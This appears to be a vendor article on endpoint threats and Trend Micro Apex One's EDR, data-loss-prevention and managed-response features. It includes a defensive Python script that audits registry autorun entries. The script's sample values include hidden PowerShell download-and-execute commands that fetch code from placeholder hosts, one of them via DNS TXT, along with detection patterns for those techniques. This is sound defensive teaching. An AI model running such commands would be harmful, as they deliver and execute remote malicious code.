
Do you think the most important thing in a company is to ensure the security of the corporate network perimeter and server infrastructure? This is only partly true: creating a truly secure perimeter today is in principle impossible, unless the company applies the strictest information security rules: a "white list" of sites, paper-only correspondence, sealed USB ports on computers and no visitors at all. If that does not describe your company, keep in mind that endpoint devices have become the main risk zone, and antivirus alone is not enough to protect them. Yes, the antivirus will block the unpacking of an archive with a dangerous file, and the browser will refuse to open a compromised site, but there are many threats against which basic protection packages are powerless. Below we discuss some of them, and how to protect against them.
What conventional antivirus in a company cannot handle
Fileless attacks. Malicious PowerShell scripts that are loaded straight into RAM cannot be detected by antivirus at the penetration stage: they are not executable programs, just a set of text commands that runs in an existing shell such as PowerShell. So as not to disappear when the computer is turned off, such Trojans register their commands in the registry.
It is impossible to detect a fileless attack by traditional means; a Trojan can store its malicious script, for example, in the TXT records of a DNS zone. According to the Trend Micro 2018 Midyear Security Roundup, the number of fileless attacks worldwide is growing: 24,430 incidents were recorded in January 2018, and more than 38 thousand in June.
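The registry persistence and PowerShell launch pattern described above is something an administrator can audit without a commercial product. The following is an added example, not code from the article or from Trend Micro: it inspects constructed Run-key values, decodes any `-EncodedCommand` argument (base64 of UTF-16LE text) and flags the launch flags and cmdlets typical of fileless persistence, while leaving a plain `-File` script launch alone. All sample values, the placeholder payload and the `.invalid` host names are made up for the demonstration.

```python
import base64
import re

# Constructed sample values from an HKCU\...\CurrentVersion\Run key (not taken from a real host);
# the encoded payload is a placeholder download cradle built here so the decoder has input to show.
PLACEHOLDER_STAGE = 'IEX (New-Object Net.WebClient).DownloadString("http://placeholder.invalid/stage")'
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Backup": r"powershell.exe -File C:\Scripts\backup.ps1",  # legitimate script launch
    "Updater": "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand "
               + base64.b64encode(PLACEHOLDER_STAGE.encode("utf-16le")).decode(),
    "Sync": 'powershell -w hidden -c "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
            '(Resolve-DnsName -Type TXT c2.placeholder.invalid).Strings)))"',
}

# Launch flags and cmdlets typical of fileless persistence, matched case-insensitively against
# the command line plus the decoded -EncodedCommand payload (if any).
SUSPICIOUS_PATTERNS = {
    "encoded command": r"-(?:e|ec|en|enc|encodedcommand)\s",
    "hidden window": r"-w(?:indowstyle)?\s+hidden",
    "execution policy bypass": r"-ex(?:ec|ecutionpolicy)?\s+bypass",
    "profile skipped": r"-nop(?:rofile)?\b",
    "Invoke-Expression": r"\biex\b|invoke-expression",
    "remote or DNS-hosted payload": r"downloadstring|resolve-dnsname|nslookup|-type\s+txt",
}


def decode_encoded_command(cmd: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE text), or None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def audit_run_values(values: dict) -> dict:
    """Map each PowerShell autorun entry showing fileless-persistence traits to its indicators and
    decoded payload; non-PowerShell entries and plain script launches are left out."""
    findings = {}
    for name, cmd in values.items():
        if not re.search(r"\b(?:powershell|pwsh)(?:\.exe)?\b", cmd, re.I):
            continue
        decoded = decode_encoded_command(cmd)
        haystack = cmd if decoded is None else f"{cmd} {decoded}"
        hits = [label for label, pat in SUSPICIOUS_PATTERNS.items() if re.search(pat, haystack, re.I)]
        if hits:
            findings[name] = {"indicators": hits, "decoded": decoded}
    return findings
```

On a real host the same logic would be fed the output of `reg query` or the equivalent registry API call; the `Sync` entry shows why the DNS TXT technique mentioned above is worth a dedicated indicator.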
Exploits in unpatched operating systems. Operating system updates fix known vulnerabilities for which exploits may already exist. Before deploying updates to hundreds or thousands of computers it is worth testing them first, since updates sometimes contain errors that temporarily take some computers out of service. Leaving the installation of updates to users is a sure way to open a gap in the network through the fault of a careless or unskilled employee.
The notorious WannaCry and NotPetya spread through a Windows vulnerability that had been closed by updates two months before the epidemic began: the first version of WannaCry appeared on January 16, 2017; on March 14, Microsoft distributed a patch for the SMB protocol for all current versions of Windows; and the infamous epidemic began only on May 12. Getting onto users' unpatched computers, the ransomware spread within corporate networks, paralyzing the activities of companies. Why hundreds of thousands of corporate computers in major companies remained without a critical Windows update for two months is a serious question for the relevant departments.
Mobile devices. Despite the vetting of applications before publication in the Play Market and App Store, supposedly useful programs often come bundled with spyware and even miners. For example, an analysis of 283 VPN applications for Android revealed that 43% of them contain unwanted advertising, in 17% the advertising has malicious functions, 29% are a source of Trojan modules, 6% contain potentially dangerous software, and another 5% spy on their users.
Employees who do not know the basic principles of information security. The main hole in the information security of any company remains its employees, or rather their ignorance of information security principles. No virus can exfiltrate important information and documents with the same elegance and efficiency as an employee who downloads a program that turns out to be malicious.
How to protect endpoints
The growing complexity of threats makes traditional protection methods ineffective. Antivirus alone is not enough to prevent data leakage or keep intruders out of the network, and installing several highly specialized solutions often leads to conflicts and errors. In addition, configuring and maintaining the joint operation of several security programs is not an easy task. What is needed is a comprehensive solution that lets users perform their work comfortably while ensuring the safety of the company's information assets.
The ideal protection suite should be:
- multiplatform: working on all popular desktop and mobile operating systems, which is especially important for companies with BYOD policies and remote work;
- automatic: detecting threats and responding to them without user intervention;
- intelligent: using not only traditional signature-based detection but also behavioral analysis, so that both file-based and fileless malware are detected;
- centrally managed: administrators should see the status of all protected devices in real time and be able to change security settings depending on the location of the device;
- integrated with behavioral analysis systems and able to support incident investigation;
- able to control applications on end devices, protecting the corporate network from the penetration of malicious programs and from targeted attacks originating from devices inside the organization's network.

Traditional EPP (Endpoint Protection Platform) solutions protect user devices well against known threats, but cope much worse with the latest types of attacks. They successfully remediate incidents on individual devices but, as a rule, cannot recognize that these incidents are fragments of a complex, multi-stage attack that can cause serious damage to an organization over time. They have almost no ability to analyze incidents automatically. This is why the EDR (Endpoint Detection and Response) class of solutions was developed.
How does a modern EDR solution work?
Let's look at how an endpoint security solution works using Trend Micro's Apex One as an example. This product is a substantial reworking of the well-known OfficeScan endpoint security solution.
One of the key features of Apex One is multi-layered protection of endpoints, which prevents malware from spreading over the network, degrading computer performance and stealing confidential data. The solution instantly blocks zero-day threats on physical and virtual desktops as well as laptops, both online and offline.
What exactly does Apex One do?
- Protects against advanced threats:
  - prevents known and unknown vulnerabilities from being used to penetrate the system before patches are released;
  - protects unsupported and outdated operating systems for which fix packs are no longer released;
  - automatically assesses risks and recommends activation of the virtual patches required for each individual device;
  - dynamically changes security settings depending on the location of the device;
  - protects end devices with minimal impact on network bandwidth, user productivity and performance.
- Blocks inappropriate network traffic:
  - applies filters to alert on and block certain types of traffic, for example instant messaging and video streaming;
  - uses deep packet inspection to identify traffic that may be malicious to applications;
  - filters forbidden network traffic and checks allowed traffic by monitoring connection state;
  - detects malicious traffic hidden by the use of well-known protocols on non-standard ports;
  - prevents backdoors from entering the corporate network.
- Makes protection timely:
  - provides protection until official patches are released and installed;
  - protects operating systems and common applications from known and unknown attacks.
- Simplifies deployment and management in existing infrastructure:
  - a simplified control panel makes it convenient to monitor the environment in detail, down to each individual user;
  - vulnerability assessments are based on Microsoft security bulletins, CVE data and other sources.
And now we will tell (and show) how it works.
All information about the state of endpoints and threats is collected in a single console, Apex Central. Analysts can perform detailed monitoring, down to each individual user, and manage policies. The single console covers local, cloud and hybrid environments. It also provides access to operational intelligence from the local sandbox or from the Trend Micro Smart Protection Network infrastructure, which uses cloud-based threat data from around the world and provides real-time protection by blocking threats before they reach computers.
A single console means there is no need to switch between control panels. Here you can see how integrated detection and response are reflected in a single manager. It also provides unified integration with EDR investigations and automated detection and response to threats.
Analysis of the scale of the consequences:
- Malicious IP blocked because it has already been detected (red) (1)
- "Patient zero": unknown (orange) and not blocked (2)
- "Patient zero" is isolated and the search for the root cause begins (3)
Search for root causes using Trend Micro global threat intelligence:
- Red ("bad");
- Orange ("suspicious");
- Black ("satisfactory").
Response options:
- Stop execution;
- Share information about the threat;
- Investigate.
Endpoint Sensor from the Apex One package monitors the security status of the end device in context, records system-level actions and generates reports for security personnel so that the extent of an attack on the network can be assessed quickly. In particular, Endpoint Sensor tracks advanced threats such as the notorious fileless attacks and provides protection against them. Using EDR, you can run a multi-level malware search across all end devices using criteria such as OpenIOC, YARA and suspicious objects.
Even if malware gets past server-side scanning, Trend Micro User Protection examines the executable file before it is launched using machine learning. At launch, machine-learning-based behavioral analysis begins. Then sandbox analysis takes place; depending on the results of these checks, the application either starts its work or is blocked. Moreover, for safety the entire computer can be automatically isolated to contain the malware and prevent it from spreading across the network.

Apex One uses Trend Micro Vulnerability Protection technology, which protects all end devices on the network from exploits even if they have not been patched. To do this, Apex One centrally analyzes traffic for exploits and vulnerabilities, attacks on services, web malware and illegitimate traffic. Scanning takes place at high speed, so Apex One has virtually no effect on the speed of the network itself.
How leakage protection is provided
Another useful module in the Apex One solution is Data Loss Prevention. It monitors and controls the transfer of content over all possible communication channels to prevent data leakage. You can log or restrict the use of USB drives, CD/DVD, exotic IR transmitters, PCMCIA devices, modems, cloud storage and mail servers. Data transfer is controlled both in the mail client and through the web mail interface, in instant messengers and in most network protocols, such as HTTP/HTTPS, FTP and SMTP.
Data Loss Prevention has templates for recognizing more than three hundred file types, including archives; other data types are identified by specific patterns, formulas and locations. You can also create a data identifier of your own.
Finally, to guard against the most inventive users, the module controls the clipboard, pasting from it and screen capture. Once Data Loss Prevention is properly configured, the probability that valuable data leaves the company is significantly reduced.
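To make the "patterns, formulas and locations" idea concrete, here is an added example of how a DLP data identifier is built, written for this article and not taken from Trend Micro's product: a regular expression describes what a payment card number looks like, a checksum formula (Luhn) weeds out 16-digit strings that merely look like one, and a second, hypothetical pattern-only identifier stands in for a custom identifier an administrator might add. The sample text, the `PRJ-` project-code format and the card numbers are constructed for the demonstration.

```python
import re
from dataclasses import dataclass
from typing import Callable, Optional


def luhn_valid(digits: str) -> bool:
    """The checksum 'formula' that separates real payment card numbers from look-alike digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2:  # double every second digit from the right, folding two-digit results
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


@dataclass
class DataIdentifier:
    name: str
    pattern: re.Pattern                                 # what the data looks like
    validator: Optional[Callable[[str], bool]] = None   # the "formula"; None means pattern only

    def matches(self, text: str):
        for m in self.pattern.finditer(text):
            candidate = re.sub(r"[ -]", "", m.group())  # normalise separators before validating
            if self.validator is None or self.validator(candidate):
                yield m.group()


IDENTIFIERS = [
    DataIdentifier("payment card number", re.compile(r"(?<!\d)(?:\d[ -]?){15}\d(?!\d)"), luhn_valid),
    # Hypothetical custom identifier of the kind an administrator would add for internal codes.
    DataIdentifier("internal project code", re.compile(r"\bPRJ-\d{4}\b")),
]

# Constructed sample: a 16-digit reference that fails Luhn, a valid test card number, and a
# look-alike that fails the checksum. Only the real card number and the project code should fire.
SAMPLE_TEXT = ("Ref 1234567812345678 for PRJ-0042: charged card 4111 1111 1111 1111; "
               "retry on 4111-1111-1111-1112 was declined.")


def scan(text: str, identifiers=IDENTIFIERS) -> dict:
    """Return {identifier name: [matched strings]} for every identifier that fires on the text."""
    return {i.name: hits for i in identifiers if (hits := list(i.matches(text)))}
```

Without the validator, both the order reference and the mistyped card number would be flagged, which is the false-positive problem the formula step exists to solve.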
Bonus: MDR, a subscription security service
Under current conditions, maintaining a large information security team is becoming a luxury. At the same time, it is extremely important to correctly assess the damage from a cyber attack, draw up a plan of measures to eliminate the threat and prevent repeat attacks; the staff left after "optimization" will hardly find time for such investigations.
This is where Trend Micro Managed Detection and Response comes in: a threat monitoring and response service that is part of Apex One. MDR is a remote team of Trend Micro professionals who monitor customer security around the clock. It is a good fit for companies that cannot maintain a large security staff or that lack highly qualified employees.
The MDR service monitors logs, identifies critical alerts, examines them and informs the customer about the threat. Using endpoint data, the MDR team determines the root cause and attack vector and assesses the consequences. The customer can always put questions to the team of experts for clarification. MDR also draws up a detailed action plan for restoring the network after an attack.
The subscription covers not only endpoints but also networks, servers, even printers and Internet of Things devices.
In essence, Trend Micro MDR is doing everything that professional staffed information security departments do. But remotely, around the clock and by subscription.